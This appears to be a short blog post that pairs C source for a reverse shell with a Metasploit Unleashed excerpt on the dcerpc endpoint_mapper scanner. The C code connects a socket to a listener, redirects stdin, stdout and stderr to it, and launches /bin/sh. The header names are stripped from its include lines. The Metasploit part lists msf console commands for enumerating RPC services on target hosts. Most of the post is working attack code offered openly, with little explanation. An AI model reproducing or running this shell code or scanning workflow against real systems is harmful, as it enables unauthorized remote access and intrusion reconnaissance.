1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| #include #include #include #include #include #include #include int main(void) { int sockfd; // file descriptor for socket int lportno = 12345; // listener port struct sockaddr_in serv_addr; // {2,str[14]} char *const params[] = {"/bin/sh",NULL}; char *const environ[] = {NULL}; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); serv_addr.sin_family = AF_INET; // 2 serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost serv_addr.sin_port = htons(lportno); // little endian connect(sockfd, (struct sockaddr *) &serv_addr, 16); // redirect stdout and stderr dup2(sockfd,0); // stdin dup2(0,1); // stdout dup2(0,2); // stderr execve("/bin/sh",params,environ);} |
YOU NEED TO KNOW WHERE TO GO: endpoint_mapperThe endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.msf > use auxiliary/scanner/dcerpc/endpoint_mapper
msf auxiliary(endpoint_mapper) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 135 yes The target port
THREADS 1 yes The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/ |
No comments:
Post a Comment